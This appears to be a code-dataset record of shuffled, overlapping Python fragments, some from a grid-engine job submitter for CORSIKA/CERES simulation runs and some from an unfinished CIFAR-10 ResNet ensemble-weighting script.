"status='created') pending_ceres = count_jobs(CeresRun, status='created') n_queued = self.cluster.n_queued log.debug(f'{self.cluster.n_running} jobs running') log.debug(f'{n_queued} jobs",
"queue of the grid engine No new jobs are submitted if the number",
"import CorsikaRun, CeresRun from ..queries import get_pending_jobs, count_jobs, update_job_status from .corsika import prepare_corsika_job",
"port self.cluster = cluster self.location = location or hostname self.ceres_memory = ceres_memory self.corsika_memory",
"log.info(f'Submitted new CERES job with id {job.id}') else: raise ValueError(f'Unknown job type: {job}')",
"import prepare_corsika_job from .ceres import prepare_ceres_job log = logging.getLogger(__name__) hostname = socket.getfqdn() class",
"self.event.wait(self.interval) def terminate(self): self.event.set() def process_pending_jobs(self): ''' Fetches pending runs from the processing",
"in pending_jobs: if self.event.is_set(): break kwargs = { 'mopro_directory': self.mopro_directory, 'submitter_host': self.host, 'submitter_port':",
"log = logging.getLogger(__name__) hostname = socket.getfqdn() class JobSubmitter(Thread): def __init__( self, interval, max_queued_jobs,",
"Parametrs ---------- interval: int number of seconds to wait between submissions max_queued_jobs: int",
"raise ValueError(f'Unknown job type: {job}') update_job_status(type(job), job.id, 'queued', location=self.location) except: log.exception('Could not submit",
"job with id {job.id}') else: raise ValueError(f'Unknown job type: {job}') update_job_status(type(job), job.id, 'queued',",
"pending runs from the processing database and submits them using qsub if not",
"basic structure for erna. Logfiles, jars, xmls and analysis output are stored in",
"the submitter node port: int port for the zmq communication ''' super().__init__() self.event",
"= ceres_memory self.corsika_memory = corsika_memory self.tmp_dir = tmp_dir def run(self): while not self.event.is_set():",
"CeresRun from ..queries import get_pending_jobs, count_jobs, update_job_status from .corsika import prepare_corsika_job from .ceres",
"interval self.max_queued_jobs = max_queued_jobs self.mopro_directory = mopro_directory self.host = host self.port = port",
"jobs are submitted if the number of jobs in the queue is higher",
"qsub if not to many jobs are running already. ''' pending_corsika = count_jobs(CorsikaRun,",
"**kwargs), memory=self.ceres_memory ) log.info(f'Submitted new CERES job with id {job.id}') else: raise ValueError(f'Unknown"
] |
[
"args.iter criterion = nn.CrossEntropyLoss() alphas = torch.nn.Parameter(alphas) optimizer = optim.Adam([alphas], lr=args.lr, betas=(0.9, 0.999))",
"metrics to TB every 100 iterations # if i % 100 == 0:",
"4, ) loader = iter(testloader) ## Create model model_names = chpt_augm_dict[args.model] if args.use_augm",
"'frog', 'horse', 'ship', 'truck') model_dict = { 'resnet18' : ResNet18(), # 11m params",
"{ 'resnet18' : ResNet18(), # 11m params 'resnet34' : ResNet34(), # 21m 'resnet50'",
"# torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format( int( i / 1000) ))) # net.train() # writer_test.add_scalar('test_acc',",
"if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params * alphas[ii] ) else: for name,",
"ResNet18(), # 11m params 'resnet34' : ResNet34(), # 21m 'resnet50' : ResNet50(), #",
"criterion, best_acc) # logging.info('=> Saving model with Loss: {:.5f} -- ACC: {} at",
"i) # # test model and save it every 5000 iterations # if",
"'dog', 'frog', 'horse', 'ship', 'truck') model_dict = { 'resnet18' : ResNet18(), # 11m",
"transform=transform_test) testloader = torch.utils.data.DataLoader( testset, # batch_size = len(testset), batch_size = 1000, shuffle",
"('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck') model_dict = {",
"inputs = inputs.to(device) # [bs, 3, 32, 32] targets = targets.to(device) # [bs]",
"logging.info('=> Accuracy improved from {} --> {} at iteration {} K'.format(best_acc, test_acc, int(i",
"torch.nn.Parameter( model_params * alphas[ii] ) else: for name, model_params in model.named_parameters(): if not",
"# if i % 100 == 0: # writer_train.add_scalar('train_acc', train_acc, i) # writer_train.add_scalar('train_loss',",
"parser.add_argument('--lr', default=1e-2, type=float, help='learning rate') parser.add_argument('--iter', default=100, type=int, help='number of total iterations to",
"58m 'vgg19' : VGG('VGG19'), } chpt_vanilla_dict = { 'resnet18': ['R18_1', 'R18_2', 'R18_3'], 'resnet50':",
"} chpt_name = 'net_80.pth' def test(model, testloader, criterion, best_acc): net.eval() test_loss = 0",
"outputs = model(inputs) loss = criterion(outputs, targets) test_loss += loss.item() _, predicted =",
"nn.CrossEntropyLoss() alphas = torch.nn.Parameter(alphas) optimizer = optim.Adam([alphas], lr=args.lr, betas=(0.9, 0.999)) ### Main optimization",
") else: for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter(",
"targets) print(alphas) # print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward() optimizer.step() print(alphas) # print(list(model.parameters())[0][0]) pdb.set_trace() # criterion",
"of experiment') parser.add_argument('--model', default='resnet18', type=str, help='model to train') parser.add_argument('--use_augm', action='store_true', help='use data augmentations?')",
"updating -- solve this issue for it in range(num_iters): # load model weights",
"= nn.CrossEntropyLoss() # optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4) # for idx in",
"# optimizer.step() # scheduler.step() # train_loss += loss.item() # _, predicted = outputs.max(1)",
"int( i / 1000)) ) # state = { # 'net' : net.state_dict(),",
"from tqdm import tqdm import os, pdb, logging, argparse import torch import torch.nn",
"100. * correct_samples / total_samples total_test_loss = test_loss / (batch_idx+1) return total_test_loss, test_acc",
"## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO) console = logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args) writer_test =",
"# optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4) # for idx in pbar: #",
"os.makedirs(checkpoint_dir) ## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO) console = logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args) writer_test",
"criterion(outputs, targets) print(alphas) # print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward() optimizer.step() print(alphas) # print(list(model.parameters())[0][0]) pdb.set_trace() #",
"torch.nn.Parameter( model_params + alphas[ii] * checkpoint[name] ) batch = next(loader) inputs, targets =",
"lr=args.lr, momentum=0.9, weight_decay=1e-4) # for idx in pbar: # i = idx +",
"= 0, 0 with torch.no_grad(): for batch_idx, (inputs, targets) in enumerate(testloader): inputs =",
"loss = criterion(outputs, targets) # optimizer.zero_grad() # loss.backward() # optimizer.step() # scheduler.step() #",
"in enumerate(testloader): inputs = inputs.to(device) # [bs, 3, 32, 32] targets = targets.to(device)",
": ResNet34(), # 21m 'resnet50' : ResNet50(), # 23m 'resnet101': ResNet101(), # 42m",
"0: # writer_train.add_scalar('train_acc', train_acc, i) # writer_train.add_scalar('train_loss', train_loss, i) # # test model",
"transforms from models import * parser = argparse.ArgumentParser() parser.add_argument('--name', default='', type=str, help='name of",
"= 100. * correct_samples / total_samples total_test_loss = test_loss / (batch_idx+1) return total_test_loss,",
"i) # if test_acc > best_acc: # logging.info('=> Accuracy improved from {} -->",
"testloader = torch.utils.data.DataLoader( testset, # batch_size = len(testset), batch_size = 1000, shuffle =",
"transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) testset =",
"= idx + args.start_iter # if i > args.iter: # print(\"TRAINING IS DONE!\")",
"'resnet18' : ResNet18(), # 11m params 'resnet34' : ResNet34(), # 21m 'resnet50' :",
"models {}'.format(num_models, args.model)) model = model_dict[args.model] model = model.to(device) model.train() ## Init alphas",
"batch_size = 1000, shuffle = False, # sampler = data_sampler(testset, shuffle=False), num_workers =",
"# inputs = inputs.to(device) # [bs, 3, 32, 32] # targets = targets.to(device)",
"type=float, help='learning rate') parser.add_argument('--iter', default=100, type=int, help='number of total iterations to run') args",
"and multiply with alphas for ii, model_name in enumerate(model_names): model_path = os.path.join('results', model_name,",
"weight as required torch.manual_seed(0) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") classes =",
"from {} --> {} at iteration {} K'.format(best_acc, test_acc, int(i / 1000) ))",
"torch.rand(num_models) / num_models alphas[-1] = 1 - sum(alphas[:-1]) assert sum(alphas).item() == 1, 'Alphas",
"if i % 100 == 0: # writer_train.add_scalar('train_acc', train_acc, i) # writer_train.add_scalar('train_loss', train_loss,",
"# 58m 'vgg19' : VGG('VGG19'), } chpt_vanilla_dict = { 'resnet18': ['R18_1', 'R18_2', 'R18_3'],",
"{} K'.format(test_loss, test_acc, int( i / 1000)) ) # state = { #",
"0 total_samples, correct_samples = 0, 0 with torch.no_grad(): for batch_idx, (inputs, targets) in",
"'optim')) ## Data print('=> Preparing data..') transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465),",
"model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params + alphas[ii] * checkpoint[name] )",
"'resnet101': ResNet101(), # 42m 'resnet152': ResNet152(), # 58m 'vgg19' : VGG('VGG19'), } chpt_vanilla_dict",
"= 4, ) loader = iter(testloader) ## Create model model_names = chpt_augm_dict[args.model] if",
"assert sum(alphas).item() == 1, 'Alphas should sum to 1' num_iters = args.iter criterion",
"predicted.eq(targets).sum().item() # save loss over the whole test set at TB test_acc =",
"as optim import torch.nn.functional as F import torch.backends.cudnn as cudnn from torch.utils.tensorboard import",
"= model(inputs) loss = criterion(outputs, targets) print(alphas) # print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward() optimizer.step() print(alphas)",
"torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format( int( i / 1000) ))) # net.train() # writer_test.add_scalar('test_acc', test_acc,",
"<filename>ensemble.py<gh_stars>0 from tqdm import tqdm import os, pdb, logging, argparse import torch import",
"test_loss / (batch_idx+1) return total_test_loss, test_acc def main(): checkpoint_dir = 'results_ensembles/{}'.format(args.name) if not",
"= { 'resnet18' : ResNet18(), # 11m params 'resnet34' : ResNet34(), # 21m",
"i) # writer_test.add_scalar('test_loss', test_loss, i) # if test_acc > best_acc: # logging.info('=> Accuracy",
"tqdm import tqdm import os, pdb, logging, argparse import torch import torch.nn as",
"\"cpu\") classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')",
"* alphas[ii] ) else: for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params",
"= os.path.join('results', model_name, chpt_name) checkpoint = torch.load(model_path)['net'] if ii==0: model.load_state_dict(checkpoint) for name, model_params",
"logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args) writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ## Data print('=> Preparing data..')",
"device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") classes = ('plane', 'car', 'bird', 'cat',",
"Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO) console = logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args) writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir,",
"import torch.optim as optim import torch.nn.functional as F import torch.backends.cudnn as cudnn from",
"model_dict[args.model] model = model.to(device) model.train() ## Init alphas and optimizer alphas = torch.rand(num_models)",
"name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params * alphas[ii] ) else: for name, model_params in",
"'acc' : test_acc, # 'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format(",
"this issue for it in range(num_iters): # load model weights and multiply with",
"test_acc = 100. * correct_samples / total_samples total_test_loss = test_loss / (batch_idx+1) return",
"= 0 total_samples, correct_samples = 0, 0 with torch.no_grad(): for batch_idx, (inputs, targets)",
"os, pdb, logging, argparse import torch import torch.nn as nn import torch.optim as",
"= ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck') model_dict =",
"= { 'resnet18': ['R18_augm1', 'R18_augm2', 'R18_augm3'], 'resnet50': ['R50_augm1', 'R50_augm2', 'R50_augm3'], } chpt_name =",
"to 1' num_iters = args.iter criterion = nn.CrossEntropyLoss() alphas = torch.nn.Parameter(alphas) optimizer =",
"train_loss, i) # # test model and save it every 5000 iterations #",
"the whole test set at TB test_acc = 100. * correct_samples / total_samples",
"main(): checkpoint_dir = 'results_ensembles/{}'.format(args.name) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO)",
"iteration {} K'.format(best_acc, test_acc, int(i / 1000) )) # state = { #",
"as required torch.manual_seed(0) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") classes = ('plane',",
"and optimizer alphas = torch.rand(num_models) / num_models alphas[-1] = 1 - sum(alphas[:-1]) assert",
"21m 'resnet50' : ResNet50(), # 23m 'resnet101': ResNet101(), # 42m 'resnet152': ResNet152(), #",
"import torch.backends.cudnn as cudnn from torch.utils.tensorboard import SummaryWriter import torchvision import torchvision.transforms as",
"'resnet18': ['R18_1', 'R18_2', 'R18_3'], 'resnet50': ['R50_1', 'R50_2', 'R50_3'], } chpt_augm_dict = { 'resnet18':",
"'resnet50' : ResNet50(), # 23m 'resnet101': ResNet101(), # 42m 'resnet152': ResNet152(), # 58m",
"print('=> Preparing data..') transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),",
"total_test_loss, test_acc def main(): checkpoint_dir = 'results_ensembles/{}'.format(args.name) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ## Logging",
"= chpt_augm_dict[args.model] if args.use_augm else chpt_vanilla_dict[args.model] num_models = len(model_names) print('=> Using {} models",
"writer_test.add_scalar('test_loss', test_loss, i) # if test_acc > best_acc: # logging.info('=> Accuracy improved from",
"{ # 'net' : net.state_dict(), # 'acc' : test_acc, # 'iter' : i,",
"{}'.format(num_models, args.model)) model = model_dict[args.model] model = model.to(device) model.train() ## Init alphas and",
"= torch.load(model_path)['net'] if ii==0: model.load_state_dict(checkpoint) for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'):",
"as cudnn from torch.utils.tensorboard import SummaryWriter import torchvision import torchvision.transforms as transforms from",
"Init alphas and optimizer alphas = torch.rand(num_models) / num_models alphas[-1] = 1 -",
"model(inputs) loss = criterion(outputs, targets) test_loss += loss.item() _, predicted = outputs.max(1) total_samples",
"pbar: # i = idx + args.start_iter # if i > args.iter: #",
"to train') parser.add_argument('--use_augm', action='store_true', help='use data augmentations?') parser.add_argument('--lr', default=1e-2, type=float, help='learning rate') parser.add_argument('--iter',",
"} chpt_augm_dict = { 'resnet18': ['R18_augm1', 'R18_augm2', 'R18_augm3'], 'resnet50': ['R50_augm1', 'R50_augm2', 'R50_augm3'], }",
"alphas are not updating -- solve this issue for it in range(num_iters): #",
"to run') args = parser.parse_args() # use this to init weight as required",
"torch import torch.nn as nn import torch.optim as optim import torch.nn.functional as F",
"if args.use_augm else chpt_vanilla_dict[args.model] num_models = len(model_names) print('=> Using {} models {}'.format(num_models, args.model))",
"shuffle=False), num_workers = 4, ) loader = iter(testloader) ## Create model model_names =",
"# # log metrics to TB every 100 iterations # if i %",
"model_name, chpt_name) checkpoint = torch.load(model_path)['net'] if ii==0: model.load_state_dict(checkpoint) for name, model_params in model.named_parameters():",
"os.path.join('results', model_name, chpt_name) checkpoint = torch.load(model_path)['net'] if ii==0: model.load_state_dict(checkpoint) for name, model_params in",
"} chpt_vanilla_dict = { 'resnet18': ['R18_1', 'R18_2', 'R18_3'], 'resnet50': ['R50_1', 'R50_2', 'R50_3'], }",
"1000, shuffle = False, # sampler = data_sampler(testset, shuffle=False), num_workers = 4, )",
"# load model weights and multiply with alphas for ii, model_name in enumerate(model_names):",
"# _, predicted = outputs.max(1) # total_samples += targets.size(0) # correct_samples += predicted.eq(targets).sum().item()",
"= 1000, shuffle = False, # sampler = data_sampler(testset, shuffle=False), num_workers = 4,",
"import torchvision import torchvision.transforms as transforms from models import * parser = argparse.ArgumentParser()",
"{:.5f} -- ACC: {} at iteration {} K'.format(test_loss, test_acc, int( i / 1000))",
"# writer_train.add_scalar('train_loss', train_loss, i) # # test model and save it every 5000",
"= test_loss / (batch_idx+1) return total_test_loss, test_acc def main(): checkpoint_dir = 'results_ensembles/{}'.format(args.name) if",
"+= targets.size(0) # correct_samples += predicted.eq(targets).sum().item() # train_acc = correct_samples / total_samples #",
"transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) testset = torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test)",
"import tqdm import os, pdb, logging, argparse import torch import torch.nn as nn",
"int( i / 1000) ))) # net.train() # writer_test.add_scalar('test_acc', test_acc, i) # writer_test.add_scalar('test_loss',",
"SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ## Data print('=> Preparing data..') transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822,",
"targets.to(device) # [bs] outputs = model(inputs) loss = criterion(outputs, targets) test_loss += loss.item()",
"= targets.to(device) # [bs] outputs = model(inputs) loss = criterion(outputs, targets) test_loss +=",
"== 0: # test_loss, test_acc = test(net, testloader, criterion, best_acc) # logging.info('=> Saving",
"(inputs, targets) in enumerate(testloader): inputs = inputs.to(device) # [bs, 3, 32, 32] targets",
"model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params * alphas[ii] )",
"not updating -- solve this issue for it in range(num_iters): # load model",
"/ 1000)) ) # state = { # 'net' : net.state_dict(), # 'acc'",
": test_acc, # 'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_best.pth')) #",
"model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params * alphas[ii] ) else: for",
"# train_loss += loss.item() # _, predicted = outputs.max(1) # total_samples += targets.size(0)",
"# break # train_loss = 0 # total_samples, correct_samples = 0, 0 #",
"next(loader) inputs, targets = batch inputs = inputs.to(device) targets = targets.to(device) outputs =",
"optim.Adam([alphas], lr=args.lr, betas=(0.9, 0.999)) ### Main optimization loop ## TODO: alphas are not",
"32, 32] # targets = targets.to(device) # [bs] # outputs = net(inputs) #",
"optimizer alphas = torch.rand(num_models) / num_models alphas[-1] = 1 - sum(alphas[:-1]) assert sum(alphas).item()",
"argparse.ArgumentParser() parser.add_argument('--name', default='', type=str, help='name of experiment') parser.add_argument('--model', default='resnet18', type=str, help='model to train')",
"chpt_augm_dict[args.model] if args.use_augm else chpt_vanilla_dict[args.model] num_models = len(model_names) print('=> Using {} models {}'.format(num_models,",
"# log metrics to TB every 100 iterations # if i % 100",
"num_models alphas[-1] = 1 - sum(alphas[:-1]) assert sum(alphas).item() == 1, 'Alphas should sum",
"import torch.nn.functional as F import torch.backends.cudnn as cudnn from torch.utils.tensorboard import SummaryWriter import",
"= transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) testset = torchvision.datasets.CIFAR10(root='data',",
"* checkpoint[name] ) batch = next(loader) inputs, targets = batch inputs = inputs.to(device)",
"== 1, 'Alphas should sum to 1' num_iters = args.iter criterion = nn.CrossEntropyLoss()",
"= model_dict[args.model] model = model.to(device) model.train() ## Init alphas and optimizer alphas =",
"args.use_augm else chpt_vanilla_dict[args.model] num_models = len(model_names) print('=> Using {} models {}'.format(num_models, args.model)) model",
"name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params * alphas[ii]",
"'R50_3'], } chpt_augm_dict = { 'resnet18': ['R18_augm1', 'R18_augm2', 'R18_augm3'], 'resnet50': ['R50_augm1', 'R50_augm2', 'R50_augm3'],",
"console.setLevel(logging.INFO) logging.info(args) writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ## Data print('=> Preparing data..') transform_test =",
"model.load_state_dict(checkpoint) for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params",
"torch.nn as nn import torch.optim as optim import torch.nn.functional as F import torch.backends.cudnn",
"100 iterations # if i % 100 == 0: # writer_train.add_scalar('train_acc', train_acc, i)",
"0: # test_loss, test_acc = test(net, testloader, criterion, best_acc) # logging.info('=> Saving model",
"with Loss: {:.5f} -- ACC: {} at iteration {} K'.format(test_loss, test_acc, int( i",
"return total_test_loss, test_acc def main(): checkpoint_dir = 'results_ensembles/{}'.format(args.name) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ##",
"'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_best.pth')) # best_acc = test_acc",
"# [bs] outputs = model(inputs) loss = criterion(outputs, targets) test_loss += loss.item() _,",
"iterations to run') args = parser.parse_args() # use this to init weight as",
"# 21m 'resnet50' : ResNet50(), # 23m 'resnet101': ResNet101(), # 42m 'resnet152': ResNet152(),",
"in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params + alphas[ii] * checkpoint[name]",
"optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4) # for idx in pbar: # i = idx",
"if i > args.iter: # print(\"TRAINING IS DONE!\") # break # train_loss =",
"writer_train.add_scalar('train_acc', train_acc, i) # writer_train.add_scalar('train_loss', train_loss, i) # # test model and save",
"inputs.to(device) # [bs, 3, 32, 32] # targets = targets.to(device) # [bs] #",
"test set at TB test_acc = 100. * correct_samples / total_samples total_test_loss =",
"# state = { # 'net' : net.state_dict(), # 'acc' : test_acc, #",
"outputs = net(inputs) # loss = criterion(outputs, targets) # optimizer.zero_grad() # loss.backward() #",
"* parser = argparse.ArgumentParser() parser.add_argument('--name', default='', type=str, help='name of experiment') parser.add_argument('--model', default='resnet18', type=str,",
"outputs.max(1) # total_samples += targets.size(0) # correct_samples += predicted.eq(targets).sum().item() # train_acc = correct_samples",
"Saving model with Loss: {:.5f} -- ACC: {} at iteration {} K'.format(test_loss, test_acc,",
"3, 32, 32] targets = targets.to(device) # [bs] outputs = model(inputs) loss =",
"betas=(0.9, 0.999)) ### Main optimization loop ## TODO: alphas are not updating --",
"to TB every 100 iterations # if i % 100 == 0: #",
"enumerate(model_names): model_path = os.path.join('results', model_name, chpt_name) checkpoint = torch.load(model_path)['net'] if ii==0: model.load_state_dict(checkpoint) for",
"5000 iterations # if i % args.iter_save == 0: # test_loss, test_acc =",
"iterations # if i % args.iter_save == 0: # test_loss, test_acc = test(net,",
"> best_acc: # logging.info('=> Accuracy improved from {} --> {} at iteration {}",
"100 == 0: # writer_train.add_scalar('train_acc', train_acc, i) # writer_train.add_scalar('train_loss', train_loss, i) # #",
"train_loss += loss.item() # _, predicted = outputs.max(1) # total_samples += targets.size(0) #",
"best_acc) # logging.info('=> Saving model with Loss: {:.5f} -- ACC: {} at iteration",
"as nn import torch.optim as optim import torch.nn.functional as F import torch.backends.cudnn as",
"num_workers = 4, ) loader = iter(testloader) ## Create model model_names = chpt_augm_dict[args.model]",
"/ 1000) )) # state = { # 'net' : net.state_dict(), # 'acc'",
"i = idx + args.start_iter # if i > args.iter: # print(\"TRAINING IS",
"# 'net' : net.state_dict(), # 'acc' : test_acc, # 'iter' : i, #",
"{} --> {} at iteration {} K'.format(best_acc, test_acc, int(i / 1000) )) #",
"net.eval() test_loss = 0 total_samples, correct_samples = 0, 0 with torch.no_grad(): for batch_idx,",
"[bs] # outputs = net(inputs) # loss = criterion(outputs, targets) # optimizer.zero_grad() #",
"alphas for ii, model_name in enumerate(model_names): model_path = os.path.join('results', model_name, chpt_name) checkpoint =",
"# writer_test.add_scalar('test_loss', test_loss, i) # if test_acc > best_acc: # logging.info('=> Accuracy improved",
"['R50_1', 'R50_2', 'R50_3'], } chpt_augm_dict = { 'resnet18': ['R18_augm1', 'R18_augm2', 'R18_augm3'], 'resnet50': ['R50_augm1',",
"default='resnet18', type=str, help='model to train') parser.add_argument('--use_augm', action='store_true', help='use data augmentations?') parser.add_argument('--lr', default=1e-2, type=float,",
"train_acc = correct_samples / total_samples # # log metrics to TB every 100",
"test_loss += loss.item() _, predicted = outputs.max(1) total_samples += targets.size(0) correct_samples += predicted.eq(targets).sum().item()",
"chpt_name = 'net_80.pth' def test(model, testloader, criterion, best_acc): net.eval() test_loss = 0 total_samples,",
"best_acc: # logging.info('=> Accuracy improved from {} --> {} at iteration {} K'.format(best_acc,",
"not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params * alphas[ii] ) else: for name, model_params",
"pdb.set_trace() # criterion = nn.CrossEntropyLoss() # optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4) #",
"# correct_samples += predicted.eq(targets).sum().item() # train_acc = correct_samples / total_samples # # log",
"train=False, download=True, transform=transform_test) testloader = torch.utils.data.DataLoader( testset, # batch_size = len(testset), batch_size =",
"chpt_name) checkpoint = torch.load(model_path)['net'] if ii==0: model.load_state_dict(checkpoint) for name, model_params in model.named_parameters(): if",
"criterion(outputs, targets) test_loss += loss.item() _, predicted = outputs.max(1) total_samples += targets.size(0) correct_samples",
"batch_idx, (inputs, targets) in enumerate(testloader): inputs = inputs.to(device) # [bs, 3, 32, 32]",
"import * parser = argparse.ArgumentParser() parser.add_argument('--name', default='', type=str, help='name of experiment') parser.add_argument('--model', default='resnet18',",
"for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params *",
"as F import torch.backends.cudnn as cudnn from torch.utils.tensorboard import SummaryWriter import torchvision import",
"action='store_true', help='use data augmentations?') parser.add_argument('--lr', default=1e-2, type=float, help='learning rate') parser.add_argument('--iter', default=100, type=int, help='number",
"torch.cuda.is_available() else \"cpu\") classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse',",
"inputs, targets = batch # inputs = inputs.to(device) # [bs, 3, 32, 32]",
"# total_samples, correct_samples = 0, 0 # batch = next(loader) # inputs, targets",
"test_acc, # 'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format( int( i",
"load model weights and multiply with alphas for ii, model_name in enumerate(model_names): model_path",
"{} models {}'.format(num_models, args.model)) model = model_dict[args.model] model = model.to(device) model.train() ## Init",
"total_samples += targets.size(0) # correct_samples += predicted.eq(targets).sum().item() # train_acc = correct_samples / total_samples",
"0, 0 # batch = next(loader) # inputs, targets = batch # inputs",
"for it in range(num_iters): # load model weights and multiply with alphas for",
"predicted.eq(targets).sum().item() # train_acc = correct_samples / total_samples # # log metrics to TB",
"_, predicted = outputs.max(1) total_samples += targets.size(0) correct_samples += predicted.eq(targets).sum().item() # save loss",
"loss.backward() # optimizer.step() # scheduler.step() # train_loss += loss.item() # _, predicted =",
"download=True, transform=transform_test) testloader = torch.utils.data.DataLoader( testset, # batch_size = len(testset), batch_size = 1000,",
"correct_samples += predicted.eq(targets).sum().item() # save loss over the whole test set at TB",
"[bs] outputs = model(inputs) loss = criterion(outputs, targets) test_loss += loss.item() _, predicted",
"data_sampler(testset, shuffle=False), num_workers = 4, ) loader = iter(testloader) ## Create model model_names",
"train_loss = 0 # total_samples, correct_samples = 0, 0 # batch = next(loader)",
"= 0, 0 # batch = next(loader) # inputs, targets = batch #",
"next(loader) # inputs, targets = batch # inputs = inputs.to(device) # [bs, 3,",
"# outputs = net(inputs) # loss = criterion(outputs, targets) # optimizer.zero_grad() # loss.backward()",
"data augmentations?') parser.add_argument('--lr', default=1e-2, type=float, help='learning rate') parser.add_argument('--iter', default=100, type=int, help='number of total",
"Using {} models {}'.format(num_models, args.model)) model = model_dict[args.model] model = model.to(device) model.train() ##",
"int(i / 1000) )) # state = { # 'net' : net.state_dict(), #",
"+= predicted.eq(targets).sum().item() # save loss over the whole test set at TB test_acc",
"help='use data augmentations?') parser.add_argument('--lr', default=1e-2, type=float, help='learning rate') parser.add_argument('--iter', default=100, type=int, help='number of",
"(0.2023, 0.1994, 0.2010)), ]) testset = torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test) testloader = torch.utils.data.DataLoader(",
"model_params = torch.nn.Parameter( model_params + alphas[ii] * checkpoint[name] ) batch = next(loader) inputs,",
"batch inputs = inputs.to(device) targets = targets.to(device) outputs = model(inputs) loss = criterion(outputs,",
"= parser.parse_args() # use this to init weight as required torch.manual_seed(0) device =",
"# targets = targets.to(device) # [bs] # outputs = net(inputs) # loss =",
"batch = next(loader) inputs, targets = batch inputs = inputs.to(device) targets = targets.to(device)",
"iteration {} K'.format(test_loss, test_acc, int( i / 1000)) ) # state = {",
"batch = next(loader) # inputs, targets = batch # inputs = inputs.to(device) #",
"'R18_augm2', 'R18_augm3'], 'resnet50': ['R50_augm1', 'R50_augm2', 'R50_augm3'], } chpt_name = 'net_80.pth' def test(model, testloader,",
"torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog',",
"required torch.manual_seed(0) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") classes = ('plane', 'car',",
"targets.size(0) # correct_samples += predicted.eq(targets).sum().item() # train_acc = correct_samples / total_samples # #",
"= net(inputs) # loss = criterion(outputs, targets) # optimizer.zero_grad() # loss.backward() # optimizer.step()",
"import torchvision.transforms as transforms from models import * parser = argparse.ArgumentParser() parser.add_argument('--name', default='',",
"run') args = parser.parse_args() # use this to init weight as required torch.manual_seed(0)",
"% args.iter_save == 0: # test_loss, test_acc = test(net, testloader, criterion, best_acc) #",
